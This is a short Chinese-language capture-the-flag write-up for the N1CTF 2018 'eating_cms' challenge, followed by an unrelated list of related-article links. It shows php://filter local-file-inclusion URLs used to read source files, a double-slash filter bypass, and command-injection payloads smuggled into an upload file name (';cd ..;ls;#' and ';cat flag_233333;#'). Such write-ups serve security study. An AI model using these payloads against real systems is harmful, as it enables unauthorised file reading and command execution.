当前位置: 首页 > news >正文

[N1CTF 2018]eating_cms

news 2026/3/26 23:43:25

随便输入账号密码,没什么提示,试一下有没有注册界面register.php

注册并登录

试一下伪协议读取源码/user.php?page=php://filter/convert.base64-encode/resource=user

注意到这里有function.php

/user.php?page=php://filter/convert.base64-encode/resource=function

读取/user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg

但不成功

查了一下,得用这个url

//user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg

读取m4aaannngggeee

/user.php?page=m4aaannngggeee

应该是文件上传,抓包,修改文件名

尝试切到根目录的时候,发现/被过滤了,使用cd ..
payload:;cd ..;ls;#

读取flag:;cd ..;cat flag_233333;#

http://www.jsqmd.com/news/117764/

相关文章:

  • Excalidraw插件开发入门:为你的白板添加AI生成功能
  • 2025年下半年徐州预装式变电站厂商选择参考 - 2025年品牌推荐榜
  • Excalidraw容器化部署:Docker Compose快速上手教程
  • 2025年下半年徐州预装式变电站品牌综合评估与推荐 - 2025年品牌推荐榜
  • 生成式AI与社会共生:在机遇与挑战中探寻治理之道
  • 告别传统PPT配图:用Excalidraw生成独特手绘插图
  • 有实力的激光熔覆设备生产厂家2025年推荐榜单 - 2025年品牌推荐榜
  • 提升技术博客可读性:用Excalidraw绘制原创手绘图
  • Excalidraw支持导入Visio文件吗?迁移路径详解
  • AI大模型实战:9大领域60+应用场景全景解析
  • 守住伦理底线 破解生成式AI商业化的治理困局
  • 基于ERNIE-4.5-VL的智能医疗问诊系统构建(RAG+多Agent协同)
  • AI大模型的技术演进与产业赋能:迈向协同共生的智能新时代
  • C++从0到1撸了个生产级零拷贝缓存:用MAP_POPULATE和大页把文件读取性能进行提升
  • LLM + 领域 KG 的神级融合!NRAG 让神经外科诊断 AI 有了 “临床思维”
  • 49、Windows 10 系统备份、恢复与还原全攻略
  • 远程协作新体验:Excalidraw支持多人实时编辑的手绘白板
  • 传统知识库 vs AI知识库:大模型时代知识管理的革命性指南
  • 50、Windows系统备份、恢复与问题解决全攻略
  • Excalidraw社区生态观察:活跃度与更新频率分析
  • 五一视界与摩尔线程深度合作,释放物理AI进化潜能
  • 神仙级AI大模型入门教程(非常详细),爆肝熬夜整理,存下吧很难找全的!
  • Excalidraw权限管理模型设计:精细化控制访问与编辑权限
  • 2025年下半年昆明认证服务公司哪家强? - 2025年品牌推荐榜
  • Excalidraw与Miro对比:谁更适合技术团队?
  • Excalidraw性能监控与日志收集最佳实践
  • 2025年下半年四川学校旗杆品牌综合评估与选型指南 - 2025年品牌推荐榜
  • Excalidraw自定义素材库:建立专属图形组件
  • 至【牛客tracker 每日一题】
  • 5、Windows 10 配置与定制全攻略